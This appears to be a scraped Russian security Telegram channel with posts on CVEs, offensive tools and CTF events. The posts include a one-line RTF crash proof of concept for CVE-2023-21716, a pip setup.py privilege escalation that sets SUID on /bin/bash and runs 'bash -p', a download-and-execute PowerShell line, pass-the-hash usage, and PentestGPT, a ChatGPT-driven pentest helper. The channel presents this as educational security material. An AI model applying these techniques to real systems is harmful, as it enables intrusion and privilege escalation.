Похек
16.6K subscribers
2.1K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Private Shizo
urbandoor.cs
7.9 KB
🔥Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
Forwarded from Private Shizo
💥Nokoyawa ransomware attacks with Windows zero-day
In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions.

This is the one bug(CVE-2023-28252) under active attack this month, and if it seems familiar, that’s because there was a similar 0-day patched in the same component just two months ago. To me, that implies the original fix was insufficient and attackers have found a method to bypass that fix. As in February, there is no information about how widespread these attacks may be. This type of exploit is typically paired with a code execution bug to spread malware or ransomware.
1
Forwarded from Private Shizo
👨‍💻 Начинаешь карьеру в информационной безопасности? Приходи на оплачиваемую стажировку ВТБ — Школу по информационной безопасности!

⚡️ За 3 месяца ты получишь знания от экспертов ВТБ, опыт работы в топовой компании + навыки, необходимые для дальнейшего роста. Ну и конечно, конкурентную зарплату, ДМС со стоматологией, скидки от партнеров и многое-многое другое!

А еще:
— возможность перейти в штат по итогам стажировки с повышением оклада;
— надежную и стабильную работу в одном из крупнейших банков страны;
— нетворкинг и погружение в профессиональное комьюнити;
— обучение 40% времени, чтобы твои знания оставались самыми востребованными!

👾 Успей зарегистрироваться на стажировку: https://bit.ly/infosec-intern-VTB

#промо
🗿5🔥3
Класс, новая программа на bi.zone
Forwarded from BI.ZONE Bug Bounty
🪲 +1 программа: Timeweb на BI.ZONE Bug Bounty

Встречайте новую программу от Timeweb — одного из крупнейших облачных провайдеров России!

Вилка выплат — от 10 000 до 250 000 рублей. Стоимость бага зависит от критичности и домена.

Скоуп в этот раз просто огромный: одного поста не хватит, чтобы перечислить все.

Так что смотрите список доменов и прайс на нашей платформе!
Please open Telegram to view this post
VIEW IN TELEGRAM
Форум CISO-FORUM XVI
🫡6
Serv-U [v.15.3.0.X] Directory-Traversal
CVE-2021-35250


Уязвимость позволяет удаленному пользователю выполнить атаку Directory Traversal, отправив специально созданный HTTP запрос и прочитав произвольные файлы в системе. Чтение файлов возможно только на диске C:\, злоумышленник может получить информацию о файловом сервере, только зная путь к файлам.

Известно 3 варианта того, какие файлы и как может читать злоумышленник:
1. Файлы Windows по умолчанию. Пример: "C:\Windows\win.ini";
2. Обнаружение файлов с помощью брутфорса;
3. Определение путей к файлам в файлах Windows по умолчанию или используемого программного обеспечения на сервере.
🔥5
LDAP shell

Этот проект является форком проекта ldap_shell - impacket.

Подготовка:
sudo apt install -y python3

Установка:
git clone https://github.com/z-Riocool/ldap_shell.git ;cd ldap_shell ; python3 -m pip install .

Пример использования:
ldap_shell.py domain.local/user:password
ldap_shell domain.local/user:password -dc-ip 192.168.1.2
ldap_shell domain.local/user -hashes aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404e1
export KRB5CCNAME=/home/user/ticket.ccache
ldap_shell -k -no-pass domain.local/user

#tools
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python

RTF Crash POC Python 3.11 Windows 10

PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join( ("{\\f%dA;}\n" % i) for i in range(0,32761) ) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE
22 апреля пройдет task-based КибХак CTF совместно с mireaCTF (Potee) в режиме онлайн.

👻 За призовые места вы сможете получить фирменные стикеры КибХак и ценные денежные призы. В том числе по результатам соревнований будут вручены проходки на предстоящую конференцию Positive Hack Days 12. А также, возможно, одна из команд сможет пойти на пхд и посоревноваться там 😊

Правила те же, что и всегда: команды решают задания по информационной безопасности и получают «флаги», за которые начисляются баллы.

❗️ Начало в 18:00
👨‍💻 Длительность 18 часов до 12:00 воскресенья

Будут представлены задачи следующих категорий:
crypto, forensics, misc, osint, reverse, stego, web

В каждой команде должно быть не более 5-ти человек

Вся информация будет в канале mireaCTF:
https://t.me/mireactf

И в беседах КибХак и mireaCTF:
https://t.me/+TS7yGrOwxSJZP8Q3
https://t.me/+SFTJE5BHTJ0PoHq4

Регистрация уже доступна на:

https://ctf.potee.ru
🔥2🐳1🗿1
Forwarded from RedTeam brazzers (Миша)
Injector.png
1.1 MB
Итак, продолжаем заниматься импортозамещением учиться быть настоящим Red Team'ом и не использовать mimikatz! Недавно у меня вышла статья по инжекту тикетов с помощью плюсовой программы. Но потом мы вспоминаем об антивирусах и становится не так весело. Каждый раз брать проект, добавлять защиту, перекомпиливать... не вариант.
Поэтому появилась идея создания инжектора билетов на Powershell. Во-первых, это удобно, во-вторых, защищать и обфусцировать намного быстрее. Есть как готовые фреймворки , так и статьи с инструкциями.

Результатом работы стал небольшой скрипт, который должен помочь атакующему во время тестирования на проникновение. Теперь вы можете инжектить тикеты, используя Powershell! Поддерживаются два режима работы:
1. Инжект тикета, предоставленного в файле .kirbi
2. Инжект тикета, предоставленного в формате base64

Полный код можно увидеть на моем гитхабе


По любым вопросам, болячкам и возможным недочетам тулзы смело пишите мне :)
Forwarded from Monkey Hacker
Privilege Escalation via pip

Всеми наш любимый pip позволяет автоматически запускать код, когда разработчики просто загружают пакет. Таким образом мы можем скачать пакет и использовать эту возможность для повышения привилегий

После того, как мы сделали sudo -l. Мы видим, что pip download или pip setup можно запустить от sudo, так что давайте этим воспользуемся.
Сначала скопируем нужный нам репозиторий

Затем давайте сделаем некоторые изменения в файле setup.py. Импортируем os для запуска наших команд и в функции RunCommand поместим os.system("chmod u+s /bin/bash").

Собираем

python3 -m build

И скачиваем наш пакет

sudo pip3 download http://localhost/your-file.tar.gz

И теперь запустим шелл

bash -p

Have fun 👍

P.S
Полный код в комментариях

THX:
https://medium.com/checkmarx-security/automatic-execution-of-code-upon-package-download-on-python-package-manager-cd6ed9e366a8
Please open Telegram to view this post
VIEW IN TELEGRAM
3🐳1
​​Atomic Red Team

Всем привет! Извиняюсь, что давно не делал посты, загружен всем подряд. Постараюсь исправиться)
Я думаю многие из нас знакомы с Atomic Red Team. Но если нет, то давайте кратко пройдемся. Это некая библиотека PowerShell скриптов основанная на MITRE. Данный фреймворк предназначен не только для красной команды, но и для защитников, которые желают проверить свои же средства защиты. Этот фреймворк является самым популярным и полным "чек-листом" для проверки ИБ вашей рабочей среды.
Atomic Red Team предназначен не только для Windows, но и Linux + MacOS. Так что вы можете протестировать всё что вам нужно)

Команда для импорта тестов:
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); Install-AtomicRedTeam

Далее советую вам обратиться к этой и этой странице документации. Вы можете загрузить все тесты, но лучше конечно под конкретную операционную систему)

Пример запуска тестов:
Invoke-AtomicTest T1003.003 - просто запуск теста или группы тестов
Invoke-AtomicTest T1003.003 -TestNumbers 1,2 - вы выбрали только 1 и 2 тесты из группы
Invoke-AtomicTest T1003.003 -ShowDetails - вы сможете прочитать подробную информацию о конкретном тесте/ах

Для безумцев:
Invoke-AtomicTest All

Также советую вам посмотреть интересное видео от наших западных коллег об этом прекрасном инструменте)

#tools
6👍1
Media is too big
VIEW IN TELEGRAM
🔴PentestGPT

Дада, снова речь про ChatGPT, но стой, не закрывай канал. В данном случае ChatGPT выступает именно в роли помощника в пентесте. Ты задаешь ей цель, она тебе расписывает шаги для пентеста. Далее вы сами выполняете сканирование, скидываете результаты обратно ChatGPT и она анализирует ваши результаты. Звучит довольно круто, не правда ли?)

Пока ещё проект находится на стадии разработки, но вы уже можете оценить результаты на гитхабе разработчика. К посту прикреплено видео с "демонстрацией силы" бота.

По установке в посте её будет сложно уместить, так что советую перейти к гитхаб и там изучить её досконально.

#chatgpt #tools
6🔥1